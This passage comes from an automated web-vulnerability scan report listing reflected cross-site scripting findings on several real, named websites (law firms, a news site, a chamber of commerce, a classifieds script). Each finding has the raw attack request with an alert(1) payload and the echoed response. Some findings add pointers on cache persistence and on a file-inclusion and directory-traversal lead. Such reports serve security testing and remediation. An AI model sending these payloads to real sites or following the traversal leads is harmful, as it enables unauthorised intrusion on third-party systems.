Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:45:17 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1153; path=/
Set-Cookie: PortletId=1144501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 15778


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Diversity | Recruiting the Best & Brightest</title>
...[SNIP]...
ecruitingthebestandbrightest/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/recruitingthebestandbrightest/Diversity.aspx?c57c0'-alert(1)-'7612bb35499=1';//]]>
...[SNIP]...

4.95. http://www.cov.com/retainingourdiversetalent [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /retainingourdiversetalent

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1c13f'-alert(1)-'a38ede21cf4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /retainingourdiversetalent?1c13f'-alert(1)-'a38ede21cf4=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:47:34 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1154; path=/
Set-Cookie: PortletId=1145501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17215


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Diversity | Retaining Our Diverse Talent</title>

...[SNIP]...
on = '/retainingourdiversetalent/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/retainingourdiversetalent/Diversity.aspx?1c13f'-alert(1)-'a38ede21cf4=1';//]]>
...[SNIP]...

4.96. http://www.cov.com/sitemap [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /sitemap

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6862'-alert(1)-'2791e98804b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sitemap?a6862'-alert(1)-'2791e98804b=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:33:06 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1163; path=/
Set-Cookie: PortletId=1154501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 33131


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Site Map</title>
<meta name="language" content
...[SNIP]...
<![CDATA[
document.aspnetForm.action = '/sitemap/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/sitemap/Sitemap.aspx?a6862'-alert(1)-'2791e98804b=1';//]]>
...[SNIP]...

4.97. http://www.cov.com/termsofuse [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /termsofuse

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce89f'-alert(1)-'5ebc528209d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /termsofuse?ce89f'-alert(1)-'5ebc528209d=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:42:38 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1389; path=/
Set-Cookie: PortletId=3588901; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 28021


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Terms of Use</title>
<meta name="language" con
...[SNIP]...
document.aspnetForm.action = '/termsofuse/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/termsofuse/GeneralPageData.aspx?ce89f'-alert(1)-'5ebc528209d=1';//]]>
...[SNIP]...

4.98. http://www.csmonitor.com/USA/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /USA/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1edc1"-alert(1)-"8a5e635d48 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The sink is the s.pageName assignment in the site's analytics snippet, which is emitted on the 404 page as well, so a request for a non-existent path still reaches it. Note also that this 404 response is served with Cache-Control: public, must-revalidate, max-age=86400 and an Expires header one day ahead, so a shared cache in front of the site that keys on the full URL could hold the reflected payload for that URL for up to a day; the responses for 4.99 to 4.102 carry the same cache headers.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /USA1edc1"-alert(1)-"8a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Wed, 19 Jan 2011 15:47:57 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86400
Expires: Thu, 20 Jan 2011 15:47:57 GMT
Date: Wed, 19 Jan 2011 15:47:57 GMT
Content-Length: 22010
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!--seo title-->

<tit
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/USA1edc1"-alert(1)-"8a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law";
           
           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

4.99. http://www.csmonitor.com/USA/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /USA/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53b36"-alert(1)-"11f428f14f7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /USA/Justice53b36"-alert(1)-"11f428f14f7/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Wed, 19 Jan 2011 15:48:02 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86400
Expires: Thu, 20 Jan 2011 15:48:03 GMT
Date: Wed, 19 Jan 2011 15:48:03 GMT
Content-Length: 22012
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!--seo title-->

<tit
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/USA/Justice53b36"-alert(1)-"11f428f14f7/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law";
           
           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

4.100. http://www.csmonitor.com/USA/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /USA/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10b9d"-alert(1)-"77d9442451f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /USA/Justice/201110b9d"-alert(1)-"77d9442451f/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Wed, 19 Jan 2011 15:48:08 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86400
Expires: Thu, 20 Jan 2011 15:48:08 GMT
Date: Wed, 19 Jan 2011 15:48:08 GMT
Content-Length: 22012
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!--seo title-->

<tit
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/USA/Justice/201110b9d"-alert(1)-"77d9442451f/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law";
           
           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

4.101. http://www.csmonitor.com/USA/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /USA/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 133fa"-alert(1)-"9a2b6004857 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /USA/Justice/2011/0118133fa"-alert(1)-"9a2b6004857/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Wed, 19 Jan 2011 15:48:15 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86400
Expires: Thu, 20 Jan 2011 15:48:15 GMT
Date: Wed, 19 Jan 2011 15:48:15 GMT
Content-Length: 22012
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!--seo title-->

<tit
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/USA/Justice/2011/0118133fa"-alert(1)-"9a2b6004857/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law";
           
           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

4.102. http://www.csmonitor.com/USA/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /USA/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12fdc"-alert(1)-"b91d9019faa was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /USA/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law12fdc"-alert(1)-"b91d9019faa HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Wed, 19 Jan 2011 15:48:20 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86367
Expires: Thu, 20 Jan 2011 15:47:47 GMT
Date: Wed, 19 Jan 2011 15:48:20 GMT
Content-Length: 22012
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!--seo title-->

<tit
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/USA/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law12fdc"-alert(1)-"b91d9019faa";
           
           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

4.103. http://www.dcchamber.org/chamber/memberDetail.asp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber/memberDetail.asp

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d392"><script>alert(1)</script>ceb88aaba32 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The sink is a link that the 404 page rebuilds from the raw request path (the path and index.php are simply run together, with no separator), so every character of the requested path reaches the href attribute; 4.104 is the same sink reached through the second path segment.

Request

GET /chamber6d392"><script>alert(1)</script>ceb88aaba32/memberDetail.asp HTTP/1.1
Host: www.dcchamber.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Wed, 19 Jan 2011 15:48:15 GMT
Server: Apache/2.0.63 (Red Hat)
Set-Cookie: PHPSESSID=0ilpmfogoftmdtsc2djk1fdtm3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="/chamber6d392"><script>alert(1)</script>ceb88aaba32/memberDetail.aspindex.php?src=gendocs&ref=ERROR&link=ERROR&login=">
...[SNIP]...

4.104. http://www.dcchamber.org/chamber/memberDetail.asp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber/memberDetail.asp

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12668"><script>alert(1)</script>2f451230e52 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /chamber/memberDetail.asp12668"><script>alert(1)</script>2f451230e52 HTTP/1.1
Host: www.dcchamber.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Wed, 19 Jan 2011 15:48:20 GMT
Server: Apache/2.0.63 (Red Hat)
Set-Cookie: PHPSESSID=pkp73ol8c1315pd6btr3ijgkr3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="/chamber/memberDetail.asp12668"><script>alert(1)</script>2f451230e52index.php?src=gendocs&ref=ERROR&link=ERROR&login=">
...[SNIP]...

4.105. http://www.dcregistry.com/cgi-bin/classifieds/classifieds.cgi [db parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dcregistry.com
Path:   /cgi-bin/classifieds/classifieds.cgi

Issue detail

The value of the db request parameter is copied into the HTML document as plain text between tags. The payload e00cf<script>alert(1)</script>182e67954d6 was submitted in the db parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note also what the error text itself reveals: the db value is appended to a fixed directory and handed to a require call (at line 215 of classifieds.cgi, by the script's own account), and the absolute filesystem path /usr/home/dcreg/public_html/www.dcregistry.com/... is disclosed in the process. The parameter therefore controls a file name on the server and should additionally be tested for directory traversal and for inclusion of files outside the db directory; this report records only the reflected XSS, and the error message should not be returned to clients at all.

Request

GET /cgi-bin/classifieds/classifieds.cgi?db=rentalse00cf<script>alert(1)</script>182e67954d6 HTTP/1.1
Host: www.dcregistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:48:03 GMT
Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 528

We're sorry, but the script was unable to require /usr/home/dcreg/public_html/www.dcregistry.com/cgi-bin/classifieds/db/rentalse00cf<script>alert(1)</script>182e67954d6.db at line 215 in classifieds.cgi. Please make sure that these files exist, that you have the path set correctly, and that the permissions are set properly. This message could also indicate that a s
...[SNIP]...

4.106. http://www.ebglaw.com/showoffice.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ebglaw.com
Path:   /showoffice.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 45f31'><script>alert(1)</script>f88730a84f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The sink is the print-page link (...&PrintPage=True), which is rebuilt from the raw query string rather than from known parameters; that is why a parameter with an arbitrary name, not only Show, is reflected.

Request

GET /showoffice.aspx?Show=542&45f31'><script>alert(1)</script>f88730a84f4=1 HTTP/1.1
Host: www.ebglaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:48:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Pragma: no-cache
Set-Cookie: ASP.NET_SessionId=wiqyja45mfzer0uwjqmgms45; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 63794

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head pro
...[SNIP]...
<a href='showoffice.aspx?Show=542&45f31'><script>alert(1)</script>f88730a84f4=1&PrintPage=True'>
...[SNIP]...

4.107. http://www.ebglaw.com/showoffice.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ebglaw.com
Path:   /showoffice.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a79d'-alert(1)-'f0c22b0c26f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /showoffice.aspx?Show=542&5a79d'-alert(1)-'f0c22b0c26f=1 HTTP/1.1
Host: www.ebglaw.com
Accept: */*
Accept-Language: en
